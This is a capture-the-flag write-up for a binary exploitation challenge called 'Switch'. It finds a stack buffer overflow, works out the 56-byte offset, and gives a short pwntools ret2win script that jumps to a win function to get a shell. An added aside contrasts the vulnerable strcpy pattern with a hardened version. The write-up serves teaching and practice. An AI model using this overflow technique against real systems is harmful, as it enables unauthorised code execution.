CSC2023 - [Pwn] - Switch


Challenge Description

some sort of switching is possible. Don't know where it is possible

Solution

First of all, we check the binary's protections.

[Image: checksec output for the binary]

NX is enabled, so we cannot execute shellcode on the stack.

The good thing is that there is no PIE, which means function addresses are fixed and we can redirect execution to another function using the ret2win technique.

Let's run the binary and check its behaviour.

[Image: running the binary]

It takes input from the user and manipulates their age.

Let's give it a large input to check whether there is a buffer overflow.

[Image: segmentation fault on large input]

When we give it a large input, a segmentation fault occurs, which shows that there is a buffer overflow. At this point we need to find the offset after which we overwrite the return address.

[Image: finding the offset with a cyclic pattern]

The offset is 56.
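As an added aside that is not part of the original writeup: the crash above is the classic unbounded-copy-into-a-stack-buffer pattern, and NX without PIE only limits what an attacker can do with it rather than preventing it. The C below reconstructs that pattern beside a bounded version; the function names and the AGE_BUF size are assumptions, since the challenge's source is not on the page.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for illustration; the real size in the challenge is not shown. */
#define AGE_BUF 32

/* The pattern behind the crash: an unbounded copy into a fixed-size stack buffer.
 * Input longer than AGE_BUF runs past buf into the saved frame, including the
 * return address, which is what the writeup's offset of 56 measures. */
int read_age_vulnerable(const char *input) {
    char buf[AGE_BUF];
    strcpy(buf, input);            /* no length check at all */
    return atoi(buf);
}

/* Hardened form: the length is checked before any copy, the buffer is always
 * NUL-terminated, and only a plausible decimal age is accepted.
 * Returns the age, or -1 if the input is rejected. */
int read_age_safe(const char *input, size_t input_len) {
    char buf[AGE_BUF];
    char *end;
    long value;

    if (input_len >= sizeof(buf))  /* leave room for the terminator */
        return -1;
    memcpy(buf, input, input_len);
    buf[input_len] = '\0';

    errno = 0;
    value = strtol(buf, &end, 10);
    if (end == buf || errno != 0)  /* no digits, or out of long's range */
        return -1;
    if (*end == '\n')              /* fgets keeps the newline; tolerate it */
        end++;
    if (*end != '\0')              /* trailing garbage after the number */
        return -1;
    if (value < 0 || value > 150)  /* not a plausible age */
        return -1;
    return (int)value;
}
```

The safe version rejects oversized input before touching the stack buffer, so the overflow cannot occur regardless of which mitigations the binary was built with.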

We need to check the other functions in the binary that we could redirect execution to.

[Image: list of functions in the binary]

Let's check the win function.

[Image: disassembly of the win function]

There is an execve syscall that takes /bin/sh as its first argument in rdi, which shows that calling win gives us a shell directly.

So we have everything we need to write a script that gets a shell.

Script

from pwn import *

# Load the challenge binary; context.binary sets the architecture and word size for pack()
elf = context.binary = ELF('./switchpwn')

# Start the binary locally
io = process()

# 56 bytes of padding reach the saved return address (offset found above),
# then the address of win, which is fixed because the binary has no PIE
payload = cyclic(56) + pack(elf.sym.win)
io.sendline(payload)
io.interactive()

Shell

Finally, we get a shell.

[Image: shell obtained]

Writeups 2023 © RootxRAN.